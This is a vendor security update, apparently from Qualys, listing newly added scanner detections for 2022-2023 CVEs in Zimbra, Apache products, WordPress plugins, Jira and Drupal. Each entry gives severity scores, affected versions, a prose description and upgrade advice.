May 2023 Web Application Vulnerabilities Released
The Qualys Web Application Scanning (WAS) team has released a crucial update to its security signatures, which now includes detection for vulnerabilities in several widely used software applications like Zimbra, Apache Superset, Apache Spark, WordPress, Atlassian Jira Server, Apache Kafka, Apache Tomcat and Drupal. If left unaddressed, these vulnerabilities could lead to serious security risks such as data breaches, unauthorized access, and other malicious activities. It is essential for organizations to perform a comprehensive security review and address any potential vulnerabilities to ensure the safety and security of their networks and systems.
| QID | Title |
|---|---|
| 150675 | Zimbra Cross-Site Scripting (XSS) vulnerability (CVE-2022-27926) |
| 150679 | Apache Superset Insecure Default Configuration Vulnerability (CVE-2023-27524) |
| 150680 | Apache Spark Improper Privilege Management (CVE-2023-22946) |
| 150681 | WordPress Limit Login Attempts Plugin: Unauthenticated Stored XSS vulnerability (CVE-2023-1912) |
| 150682 | GeoWebCache Arbitrary Code Execution Vulnerability (CVE-2022-24846) |
| 150683 | Atlassian Jira Unauthorized Access to Resolutions |
| 150684 | WordPress Advanced Custom Fields Plugin: Cross-Site Scripting Vulnerability (CVE-2023-30777) |
| 150685 | Apache Kafka Connect Remote Code Execution (RCE) Vulnerability (CVE-2023-25194) |
| 150686 | WordPress Essential Addons for Elementor Plugin: Improper Authentication Vulnerability (CVE-2023-32243) |
| 150687 | Apache Tomcat FileUpload Denial Of Service (DoS) Vulnerability (CVE-2023-24998) |
| 150688 | Apache Tomcat Denial Of Service (DoS) Vulnerability (CVE-2023-28709) |
| 154135 | Drupal Core: Incorrect Authorization Vulnerability (CVE-2023-31250) |
| 154136 | Drupal Core: Multiple Vulnerabilities (CVE-2022-25277, CVE-2022-25278) |
| 154137 | Drupal Core: Information Disclosure Vulnerability (CVE-2022-25275) |
| 154138 | Drupal Core: Access Bypass Vulnerability (CVE-2022-25274) |
| 154139 | Drupal Core: Improper Input Validation Vulnerability (CVE-2022-25273) |
| 154140 | Drupal Core: Cross Site Scripting Vulnerability (CVE-2022-25276) |
| 154141 | WordPress Directory Traversal Vulnerability (CVE-2023-2745) |
QID 150675: Zimbra Cross-Site Scripting (XSS) vulnerability (CVE-2022-27926)
| CVE-ID | CVE-2022-27926 |
|---|---|
| Severity | Level 4 |
| CVSS 3.1 | 6.1 |
| CWE-ID | 79 |
| Affected Versions | Zimbra Collaboration 9.0.0 |
Description:
Zimbra Collaboration, a comprehensive collaborative software suite, comprising an email server and web client, is susceptible to a reflected cross-site scripting (XSS) vulnerability. This vulnerability specifically affects the “/public/launchNewWindow.jsp” component of Zimbra Collaboration, enabling unauthenticated attackers to execute arbitrary web scripts or HTML by manipulating request parameters.
Successful exploitation of this vulnerability grants an attacker the ability to execute arbitrary JavaScript code within the interface’s context or access sensitive information stored within the user’s browser. Attackers leveraging this vulnerability can employ a JavaScript snippet embedded within the URLs to trigger the download of a second-stage payload. This payload facilitates a Cross-Site Request Forgery (CSRF) attack, aiming to steal Zimbra users’ credentials and CSRF tokens.
To address this vulnerability, it is recommended that Zimbra users promptly upgrade to the latest version of Zimbra. For more detailed information regarding this vulnerability, please refer to the official Zimbra Release documentation.
QID 150679: Apache Superset Insecure Default Configuration Vulnerability (CVE-2023-27524)
| CVE-ID | CVE-2023-27524 |
|---|---|
| Severity | Level 3 |
| CVSS 3.1 | 9.8 |
| CWE-ID | 1188 |
| Affected Versions | Apache Superset versions up to and including 2.0.1 |
Description:
Apache Superset, a powerful open-source application for data exploration and visualization capable of handling vast amounts of data, is currently susceptible to Session Validation attacks. Exploiting this vulnerability allows attackers to authenticate and gain unauthorized access to sensitive resources, provided that the default configured SECRET_KEY has not been modified following the installation instructions. It is crucial to note that Superset administrators who have already altered the default value for the SECRET_KEY config are not affected by this vulnerability.
To mitigate the risk associated with this vulnerability, it is strongly recommended that customers upgrade their Apache Superset installations to the latest version available. For comprehensive details regarding this vulnerability, please consult the official Apache Superset Security Advisory.
QID 150680: Apache Spark Improper Privilege Management (CVE-2023-22946)
| CVE-ID | CVE-2023-22946 |
|---|---|
| Severity | Level 5 |
| CVSS 3.1 | 9.9 |
| CWE-ID | 269 |
| Affected Versions | Apache Spark versions prior to 3.4.0 |
Description:
Apache Spark, a versatile engine for data engineering, data science, and machine learning, supports the use of ‘proxy-user’ functionality in applications submitted through spark-submit. This feature allows applications to run with limited privileges, executing code on behalf of the submitting user. However, a security vulnerability exists where malicious configuration-related classes included in the classpath can bypass this privilege limitation. This vulnerability impacts architectures relying on proxy-user, such as those utilizing Apache Livy for application management.
The exploitation of this vulnerability could enable an attacker to execute malicious code with the same privileges as the submitting user, posing significant security risks. To address this issue, it is strongly recommended that customers upgrade to the latest version of Apache Spark. For comprehensive information regarding this vulnerability, please refer to the SPARK-41958 advisory.
QID 150681: WordPress Limit Login Attempts Plugin: Unauthenticated Stored XSS vulnerability (CVE-2023-1912)
| CVE-ID | CVE-2023-1912 |
|---|---|
| Severity | Level 3 |
| CVSS 3.1 | 6.1 |
| CWE-ID | 79 |
| Affected Versions | Limit Login Attempts plugin prior to 1.7.2 |
Description:
Limit Login Attempts is a popular WordPress plugin designed to restrict the number of login attempts, enhancing security against unauthorized access through normal login and authentication cookies. However, a vulnerability has been identified in the plugin’s handling of IP addresses when the “Site Connection” settings are configured as “From behind a reverse proxy.” Specifically, the plugin fails to properly sanitize and escape the IP address retrieved from headers like X-Forwarded-For. This flaw opens the door for unauthenticated attackers to launch Stored Cross-Site Scripting (XSS) attacks.
If successfully exploited, an attacker could execute arbitrary JavaScript code within the interface’s context or gain access to sensitive browser-based information. To mitigate this vulnerability, it is strongly recommended that customers upgrade to Limit Login Attempts 1.7.2 or a subsequent release.
QID 150682: GeoWebCache Arbitrary Code Execution Vulnerability (CVE-2022-24846)
| CVE-ID | CVE-2022-24846 |
|---|---|
| Severity | Level 4 |
| CVSS 3.1 | 7.2 |
| CWE-ID | 20, 400, 502 |
| Affected Versions | GeoWebCache versions prior to 1.19.3GeoWebCache versions 1.20.0 prior to 1.20.2 |
Description:
GeoWebCache is a Java-based tile caching server widely used for caching map tiles from various sources like OGC Web Map Service (WMS). However, certain versions of GeoWebCache are affected by a critical vulnerability related to the disk quota mechanism. This flaw allows for an unchecked JNDI (Java Naming and Directory Interface) lookup, which can be exploited to trigger class deserialization and ultimately lead to Arbitrary Code Execution.
While GeoWebCache handles JNDI strings through a local configuration file, GeoServer, which utilizes GeoWebCache, provides a user interface that enables remote access and allows these lookups. It’s important to note that this interface requires administrative-level login credentials. Exploiting this vulnerability could grant remote attackers the ability to execute arbitrary commands on the targeted system.
To safeguard against this vulnerability, it is strongly recommended that customers promptly upgrade to the latest version of GeoWebCache. This update will address the security flaw and ensure the integrity and safety of your caching server. For additional details and guidance, please refer to the GitHub Security Advisory associated with this vulnerability.
QID 150683: Atlassian Jira Unauthorized Access to Resolutions
| CVE-ID | NA |
|---|---|
| Severity | Level 2 |
| CVSS 3.1 | 5.3 |
| CWE-ID | 284 |
| Affected Versions | Atlassian Jira Server |
Description:
Jira, a widely used issue-tracking and project management tool developed by Atlassian, is currently affected by a security vulnerability. This vulnerability enables remote attackers to gain unauthorized access to the “resolutions” feature by exploiting the /rest/api/2/resolution endpoint. As a result, sensitive data within the affected Jira Server instance may be exposed, compromising its overall security.
To mitigate the risk posed by this vulnerability, it is strongly recommended to block unauthenticated access to the specific URL */rest/api/2/resolution at the network level. Implementing this measure will help protect your Jira Server instance from potential unauthorized access attempts.
QID 150684: WordPress Advanced Custom Fields Plugin: Cross-Site Scripting Vulnerability (CVE-2023-30777)
| CVE-ID | CVE-2023-30777 |
|---|---|
| Severity | Level 4 |
| CVSS 3.1 | 6.1 |
| CWE-ID | 79 |
| Affected Versions | Advanced Custom Fields plugin versions 6.1.5 and below |
Description:
Advanced Custom Fields (ACF) is a highly popular and robust WordPress plugin that empowers users to create custom fields, manage metadata, and manipulate data, resulting in more dynamic and customizable websites.
Regrettably, a vulnerability has been discovered in the ACF plugin, potentially exposing it to Reflected Cross-Site Scripting (XSS) attacks. This vulnerability arises from inadequate input sanitization and output escaping of the ‘post_status’ parameter. Exploiting this vulnerability, malicious actors can inject arbitrary web scripts that execute when unsuspecting users perform certain actions, such as clicking on a manipulated link. It is essential to recognize that this vulnerability can be exploited without requiring authentication, intensifying the risk for WordPress site owners. Successful exploitation of this vulnerability could grant attackers the ability to execute arbitrary JavaScript code within the interface’s context or gain access to sensitive browser-based information.
To safeguard your WordPress site from potential exploits, it is strongly advised to upgrade to Advanced Custom Fields version 6.1.6 or a subsequent release. This update addresses the vulnerability and helps mitigate the associated risks.
QID 150685: Apache Kafka Connect Remote Code Execution (RCE) Vulnerability (CVE-2023-25194)
| CVE-ID | CVE-2023-25194 |
|---|---|
| Severity | Level 4 |
| CVSS 3.1 | 8.8 |
| CWE-ID | 502 |
| Affected Versions | Apache Kafka Connect from version 2.3.0 to 3.3.2 |
Description:
Apache Kafka, a distributed event store and stream-processing platform, is renowned for providing a unified, high-throughput, and low-latency solution for handling real-time data feeds. However, it has come to our attention that Apache Kafka Connect, a vital component of the Kafka ecosystem, may be susceptible to a security vulnerability. Exploiting this vulnerability necessitates access to a Kafka Connect worker and the capability to create or modify connectors with an arbitrary Kafka client SASL JAAS configuration and a SASL-based security protocol. This particular exploit has been viable on Kafka Connect clusters since Apache Kafka version 2.3.0. In the event of a successful attack, the vulnerability can enable malicious actors to execute arbitrary commands on the targeted system, posing significant risks such as denial of service and remote code execution.
To ensure the security and integrity of your Apache Kafka infrastructure, it is strongly advised to upgrade to Apache Kafka version 3.4.0 or a subsequent release. For additional details and comprehensive information about this vulnerability, we encourage you to refer to the official Apache Kafka Advisory.
QID 150686: WordPress Essential Addons for Elementor Plugin: Improper Authentication Vulnerability (CVE-2023-32243)
| CVE-ID | CVE-2023-32243 |
|---|---|
| Severity | Level 5 |
| CVSS 3.1 | 9.8 |
| CWE-ID | 287 |
| Affected Versions | Essential Addons for Elementor Plugin from 5.4.0 to 5.7.1 |
Description:
Essential Addons for Elementor is an exceptional plugin that enriches the capabilities of the Elementor page builder, empowering users to create stunning websites with ease. Regrettably, a critical security vulnerability has been discovered in this plugin, which may lead to unauthenticated privilege escalation. This means that any user without authentication can exploit the vulnerability to elevate their privileges to match those of any user on the WordPress site. Consequently, a malicious actor could escalate their low-privileged account to gain higher privileges, granting them unrestricted control over the entire website.
To mitigate this vulnerability and safeguard your website from potential unauthorized access and compromise, it is strongly recommended to upgrade to Essential Addons for Elementor version 5.7.2 or any subsequent release.
QID 150687: Apache Tomcat FileUpload Denial Of Service (DoS) Vulnerability (CVE-2023-24998)
| CVE-ID | CVE-2023-24998 |
|---|---|
| Severity | Level 3 |
| CVSS 3.1 | 7.5 |
| CWE-ID | 770 |
| Affected Versions | Apache Tomcat from version 8.5.0 to 8.5.84 Apache Tomcat from version 9.0.0-M1 to 9.0.70 Apache Tomcat from version 10.1.0-M1 to 10.1.4 Apache Tomcat version 11.0.0-M1 |
Description:
Apache Tomcat utilizes a modified version of Apache Commons FileUpload to enable file upload functionality in accordance with the Jakarta Servlet specification. However, due to a vulnerability in Apache Commons FileUpload (CVE-2023-24998), Apache Tomcat was also susceptible to this security issue. The vulnerability stemmed from the absence of a limit on the number of request parts processed, thereby enabling attackers to launch a Denial of Service (DoS) attack through malicious uploads.
Exploiting this vulnerability could enable an attacker to disrupt the normal functioning of Apache Tomcat by utilizing a malicious upload or a series of uploads. To mitigate this risk and ensure the continued security and stability of your Apache Tomcat deployment, it is strongly advised to upgrade to the latest version available.
QID 150688: Apache Tomcat Denial Of Service (DoS) Vulnerability (CVE-2023-28709)
| CVE-ID | CVE-2023-28709 |
|---|---|
| Severity | Level 3 |
| CVSS 3.1 | 7.5 |
| CWE-ID | 193 |
| Affected Versions | Apache Tomcat from version 8.5.85 to 8.5.87 Apache Tomcat from version 9.0.71 to 9.0.73 Apache Tomcat from version 10.1.5 to 10.1.7 Apache Tomcat from version 11.0.0-M2 to 11.0.0-M4 |
Description:
The previous fix implemented for CVE-2023-24998 was found to be incomplete. In scenarios where non-default HTTP connector settings were utilized, allowing the maxParameterCount threshold to be reached through query string parameters, an attacker could potentially bypass the limit on uploaded request parts. This bypass could be achieved by submitting a request that precisely matches the maxParameterCount value with the parameters in the query string. Consequently, this vulnerability exposes the system to the risk of a denial-of-service (DoS) attack.
Exploiting this vulnerability successfully empowers an attacker to trigger a DoS condition by employing malicious uploads or a series of uploads. To mitigate this risk and fortify the security of your Apache Tomcat deployment, it is strongly advised to upgrade to the latest available version. For comprehensive details and instructions regarding this vulnerability and its resolution, please consult the official Apache Tomcat Security Advisory.
QID 154135: Drupal Core: Incorrect Authorization Vulnerability (CVE-2023-31250)
| CVE-ID | CVE-2023-31250 |
|---|---|
| Severity | Level 3 |
| CVSS 3.1 | 6.5 |
| CWE-ID | 863 |
| Affected Versions | Drupal from 7.0 to 7.95 Drupal from 9.4 to 9.4.13 Drupal from 9.5 to 9.5.7 Drupal from 10.0 to 10.0.7 |
Description:
In certain situations, the file download functionality in Drupal fails to adequately sanitize file paths. As a consequence, users may exploit this vulnerability to gain access to private files that are intended to be restricted. This security flaw allows unauthorized individuals to potentially view confidential information that they should not have access to.
To address this security issue and safeguard your Drupal installation, it is strongly recommended that you promptly install the latest available version. For comprehensive details and further guidance regarding this vulnerability, please refer to the official Drupal security advisory SA-CORE-2023-005.
QID 154136: Drupal Core: Multiple Vulnerabilities (CVE-2022-25277, CVE-2022-25278)
| CVE-ID | CVE-2022-25277,CVE-2022-25278 |
|---|---|
| Severity | Level 4 |
| CVSS 3.1 | 7.2 |
| CWE-ID | 863 |
| Affected Versions | Drupal from 8.0.0 to 9.3.18 Drupal from 9.4.0 to 9.4.2 |
Description:
Drupal, a PHP-based content management framework distributed under the GNU General Public License, has been identified with multiple vulnerabilities:
- CVE-2022-25277: A vulnerability in Drupal core affected the evaluation of form element access within the form API. While Drupal core forms remained unaffected, forms introduced by custom or contributed modules or themes could be susceptible to this vulnerability.
- CVE-2022-25278: Under specific circumstances, the Drupal core form API improperly evaluates form element access, potentially enabling users to modify data they should not have access to.
Exploiting these vulnerabilities could lead to security breaches, compromising the integrity, availability, and confidentiality of affected systems.
To mitigate these risks, it is strongly recommended that customers promptly update to the latest available version of Drupal. For detailed information and further guidance on these vulnerabilities, please refer to the Drupal security advisories SA-CORE-2022-014 and SA-CORE-2022-013.
QID 154137: Drupal Core: Information Disclosure Vulnerability (CVE-2022-25275)
| CVE-ID | CVE-2022-25275 |
|---|---|
| Severity | Level 4 |
| CVSS 3.1 | 7.5 |
| CWE-ID | 200 |
| Affected Versions | Drupal from 7.0 to 7.90 Drupal from 8.0.0 to 9.3.18 Drupal from 9.4.0 to 9.4.2 |
Description:
Drupal, an open-source content management framework written in PHP and distributed under the GNU General Public License, has been identified with a security vulnerability related to the Image module. Under specific circumstances, the Image module fails to adequately verify access to image files that are not stored in the standard public files directory. This vulnerability manifests when generating derivative images using the image styles system.
Exploiting this vulnerability could result in an Information Disclosure vulnerability, enabling attackers to gain access to sensitive information. This information disclosure could potentially be leveraged to carry out further attacks.
To mitigate these risks, it is strongly recommended that customers promptly update their Drupal installations to the latest available version. For comprehensive details and additional guidance on this vulnerability, please refer to the Drupal security advisory SA-CORE-2022-012.
QID 154138: Drupal Core: Access Bypass Vulnerability (CVE-2022-25274)
| CVE-ID | CVE-2022-25274 |
|---|---|
| Severity | Level 3 |
| CVSS 3.1 | 5.4 |
| CWE-ID | 284 |
| Affected Versions | Drupal from 9.3.0 to 9.3.11 |
Description:
Drupal, a PHP-based open-source content management framework distributed under the GNU General Public License, has identified a security vulnerability related to its entity access API for entity revisions, specifically in Drupal 9.3. While implementing the generic entity access API, Drupal 9.3 did not fully integrate it with existing permissions. As a result, there is a potential for access bypass for users who have general access to revisions of content but lack access to individual node and media items.
It is important to note that this vulnerability only affects websites utilizing Drupal’s revision system.
Exploiting this vulnerability enables users to bypass access restrictions, allowing them to gain unauthorized access to specific content items despite lacking the necessary individual item permissions.
To mitigate these risks, it is strongly recommended that Drupal site owners promptly upgrade to the latest available version. For comprehensive details and further guidance on this specific vulnerability, please refer to the Drupal security advisory SA-CORE-2022-009.
QID 154139: Drupal Core: Improper Input Validation Vulnerability (CVE-2022-25273)
| CVE-ID | CVE-2022-25273 |
|---|---|
| Severity | Level 4 |
| CVSS 3.1 | 7.5 |
| CWE-ID | 20 |
| Affected Versions | Drupal from 8.0.0 to 9.2.18 Drupal from 9.3.0 to 9.3.11 |
Description:
Drupal is an open-source content management framework written in PHP and distributed under the GNU General Public License. A security vulnerability has been identified in Drupal core’s form API, specifically affecting certain contributed or custom modules’ forms.
The vulnerability arises from improper input validation, potentially enabling an attacker to inject disallowed values or overwrite data within affected forms. While these vulnerable forms are not widespread, in specific scenarios, an attacker could manipulate critical or sensitive data, leading to potential compromises.
To mitigate the risks associated with this vulnerability, customers are strongly advised to promptly upgrade to the most recent version of Drupal. For more detailed information and comprehensive guidance on this specific vulnerability, please refer to the Drupal security advisory SA-CORE-2022-008.
QID 154140: Drupal Core: Cross Site Scripting Vulnerability (CVE-2022-25276)
| CVE-ID | CVE-2022-25276 |
|---|---|
| Severity | Level 3 |
| CVSS 3.1 | 6.1 |
| CWE-ID | 79 |
| Affected Versions | Drupal from 9.3.0 to 9.3.18 Drupal from 9.4.0 to 9.4.2 |
Description:
Drupal is a widely used, open-source content management framework written in PHP and distributed under the GNU General Public License. An important security vulnerability has been identified in Drupal’s Media module related to the oEmbed iframe route.
This vulnerability stems from inadequate validation of the iframe domain setting within the Media module, potentially enabling the display of embedded content within the context of the primary domain. In certain circumstances, this could result in cross-site scripting (XSS) attacks, leakage of cookies, or other vulnerabilities. Exploiting this vulnerability successfully would allow attackers to inject malicious HTML or JavaScript code through XSS, facilitating further attacks and potentially compromising sensitive information.
To safeguard your Drupal-based website and mitigate the risks associated with this vulnerability, it is crucial to promptly install the latest version of Drupal. For comprehensive details and guidance specific to this vulnerability, we recommend consulting the Drupal security advisory SA-CORE-2022-015.
QID 154141: WordPress Directory Traversal Vulnerability (CVE-2023-2745)
| CVE-ID | CVE-2023-2745 |
|---|---|
| Severity | Level 3 |
| CVSS 3.1 | 7.2 |
| CWE-ID | 22 |
| Affected Versions | WordPress versions 6.2.1 and prior |
Description:
WordPress is a widely used, open-source content management system written in PHP and commonly paired with a MySQL or MariaDB database. It has come to our attention that WordPress Core is currently susceptible to a Directory Traversal vulnerability associated with the ‘wp_lang’ parameter.
This vulnerability poses a risk as it enables unauthenticated attackers to gain access to and load arbitrary translation files on affected websites. If an attacker can upload a carefully crafted translation file, such as through an upload form, they could exploit this vulnerability to execute Cross-Site Scripting (XSS) attacks. The ability for unauthenticated attackers to access and load arbitrary translation files is a significant concern.
To ensure the security of your WordPress website, it is strongly advised that you upgrade to the latest version of WordPress promptly.